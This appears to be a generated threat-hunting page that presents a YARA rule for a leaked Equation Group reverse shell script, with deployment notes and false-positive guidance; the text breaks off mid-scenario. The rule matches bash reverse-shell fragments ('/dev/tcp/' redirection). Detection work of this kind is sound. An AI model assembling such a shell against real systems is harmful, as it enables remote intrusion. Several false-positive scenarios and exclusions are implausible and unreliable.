Equation Group hack tool leaked by ShadowBrokers- file reverse.shell.script

Hunt Hypothesis

The reverse.shell.script file detected by this rule may indicate the presence of the Equation Group’s hacking tools, which are associated with advanced persistent threats. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify potential compromise and mitigate the risk of sophisticated cyber attacks.

YARA Rule

rule EquationGroup_reverse_shell {
   meta:
      description = "Equation Group hack tool leaked by ShadowBrokers- file reverse.shell.script"
      author = "Florian Roth"
      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
      date = "2017-04-08"
      hash1 = "d29aa24e6fb9e3b3d007847e1630635d6c70186a36c4ab95268d28aa12896826"
   strings:
      $s1 = "sh >/dev/tcp/" ascii
      $s2 = " <&1 2>&1" fullword ascii
   condition:
      ( filesize < 1KB and all of them )
}

Deployment Notes

This YARA rule can be deployed in the following contexts:

• Microsoft Defender for Endpoint — Custom indicators / advanced hunting
• Email Gateway — Attachment scanning
• File Share Monitoring — Periodic scanning of shared drives
• YARA CLI — Manual threat hunting on endpoints

This rule contains 2 string patterns in its detection logic.

References

• https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1
• Source Rule

False Positive Guidance

• Scenario: Legitimate System Administration Task
  Description: A system administrator uses a script named reverse.shell.script as part of a legitimate maintenance task, such as remote server management or automated deployment.
  Filter/Exclusion: Check for presence of known admin tools (e.g., Ansible, Chef, Puppet) or scheduled job contexts (e.g., crontab, Task Scheduler) associated with the script.

• Scenario: Scheduled Job for Log Rotation or Backup
  Description: A scheduled job runs a script named reverse.shell.script to rotate logs or perform backups, which is a common administrative task.
  Filter/Exclusion: Filter based on file location (e.g., /etc/cron.d/, /var/spool/cron/) or check for presence of backup tools (e.g., rsync, tar, logrotate).

• Scenario: Development Environment Testing
  Description: A developer uses a script named reverse.shell.script in a test environment to simulate reverse shell behavior for security testing or training.
  Filter/Exclusion: Check for presence of testing frameworks (e.g., Metasploit, Kali Linux, OWASP ZAP) or environment markers (e.g., dev, test, staging).

• Scenario: Malicious File Renamed by an Admin
  Description: An attacker uploads a malicious file named reverse.shell.script, but an admin later renames it to appear as a legitimate script.
  Filter/Exclusion: Check for file hashes against known malicious files or use a whitelist of trusted scripts based on file paths and ownership.

• Scenario: Script Used for Remote Code Execution in CI/CD Pipeline
  Description: A CI/CD pipeline uses a script named reverse.shell.script to execute commands on remote servers